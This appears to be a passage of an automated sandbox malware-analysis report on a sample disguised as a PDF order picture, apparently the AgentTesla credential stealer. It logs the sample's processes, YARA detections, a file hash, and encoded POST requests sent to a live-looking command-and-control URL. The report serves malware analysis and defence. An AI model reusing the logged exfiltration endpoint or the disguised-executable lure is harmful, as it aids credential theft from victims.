                        2021-11-25 11:20:39 UTC1OUTData Raw: 70 3d 4f 39 75 62 6f 2f 47 35 47 47 69 76 59 6d 2f 70 71 4f 78 62 70 68 66 41 45 56 53 7a 31 54 45 6a 70 43 49 4f 74 30 48 72 7a 35 42 4f 38 30 36 79 41 6f 64 6d 6c 30 75 69 31 53 78 74 59 49 6a 68 59 51 6d 2f 4a 47 58 39 2f 34 30 53 41 35 66 38 6a 62 45 64 75 62 33 30 6c 7a 61 5a 6a 45 37 7a 67 47 6b 25 32 42 4a 36 6e 78 33 35 51 52 64 79 57 55 53 37 6a 76 4f 55 56 64 58 6c 4a 4d 5a 36 51 30 73 63 4d 4c 4b 31 33 61 30 63 32 32 67 46 47 37 2f 4a 73 76 57 67 6c 4f 31 2f 76 49 6d 63 4a 61 4d 77 47 39 53 54 45 71 65 63 70 50 76 57 59 70 37 6e 25 32 42 71 73 36 68 52 70 4e 54 63 45 7a 66 71 25 32 42 70 6b 5a 51 4e 68 49 65 46 42 45 59 77 55 71 37 4c 35 54 74 5a 67 64 55 5a 42 53 72 36 7a 66 55 78 54 43 4f 4b 58 77 39 45 31 6b 67 77 62 56 42 54 2f 6a 50 4b 6a
                        Data Ascii: p=O9ubo/G5GGivYm/pqOxbphfAEVSz1TEjpCIOt0Hrz5BO806yAodml0ui1SxtYIjhYQm/JGX9/40SA5f8jbEdub30lzaZjE7zgGk%2BJ6nx35QRdyWUS7jvOUVdXlJMZ6Q0scMLK13a0c22gFG7/JsvWglO1/vImcJaMwG9STEqecpPvWYp7n%2Bqs6hRpNTcEzfq%2BpkZQNhIeFBEYwUq7L5TtZgdUZBSr6zfUxTCOKXw9E1kgwbVBT/jPKj
                        2021-11-25 11:20:39 UTC1INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 11:20:39 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2021-11-25 11:20:39 UTC1INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.449846104.223.93.105443C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 11:20:52 UTC1OUTPOST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 376
                        Expect: 100-continue
                        Connection: Keep-Alive
                        2021-11-25 11:20:53 UTC1INHTTP/1.1 100 Continue
                        2021-11-25 11:20:53 UTC1OUTData Raw: 70 3d 47 78 42 77 34 58 68 59 68 58 69 76 59 6d 2f 70 71 4f 78 62 70 68 66 41 45 56 53 7a 31 54 45 6a 70 43 49 4f 74 30 48 72 7a 35 42 4f 38 30 36 79 41 6f 64 6d 6c 30 75 69 31 53 78 74 59 49 6a 68 59 51 6d 2f 4a 47 58 39 2f 34 30 53 41 35 66 38 6a 62 45 64 75 62 33 30 6c 7a 61 5a 6a 45 37 7a 67 47 6b 25 32 42 4a 36 6e 78 33 35 51 52 64 79 57 55 53 37 6a 76 4f 55 56 64 58 6c 4a 4d 5a 36 51 30 73 63 4d 4c 4b 31 33 61 30 63 32 32 67 46 47 37 2f 4a 73 76 57 67 6c 4f 31 2f 76 49 6d 63 4a 61 4d 77 47 39 53 54 45 71 65 63 70 50 76 57 59 70 37 6e 25 32 42 71 73 36 68 52 70 4e 54 63 45 7a 66 71 30 57 71 35 62 71 68 58 50 69 45 46 30 59 62 62 54 70 56 57 74 35 67 64 55 5a 42 53 72 36 7a 66 55 78 54 43 4f 4b 58 77 39 45 31 6b 67 77 62 56 42 54 2f 6a 50 4b 6a 67 53
                        Data Ascii: p=GxBw4XhYhXivYm/pqOxbphfAEVSz1TEjpCIOt0Hrz5BO806yAodml0ui1SxtYIjhYQm/JGX9/40SA5f8jbEdub30lzaZjE7zgGk%2BJ6nx35QRdyWUS7jvOUVdXlJMZ6Q0scMLK13a0c22gFG7/JsvWglO1/vImcJaMwG9STEqecpPvWYp7n%2Bqs6hRpNTcEzfq0Wq5bqhXPiEF0YbbTpVWt5gdUZBSr6zfUxTCOKXw9E1kgwbVBT/jPKjgS
                        2021-11-25 11:20:53 UTC2INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 11:20:52 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2
                        []
                        2021-11-25 11:20:53 UTC2INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:12:19:04
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe"
                        Imagebase:0xdf0000
                        File size:526848 bytes
                        MD5 hash:7FB080A6AA45B1AC87C003E3F84A2983
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        General

                        Start time:12:19:07
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Imagebase:0x3e0000
                        File size:526848 bytes
                        MD5 hash:7FB080A6AA45B1AC87C003E3F84A2983
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:12:19:08
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Imagebase:0x8c0000
                        File size:526848 bytes
                        MD5 hash:7FB080A6AA45B1AC87C003E3F84A2983
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >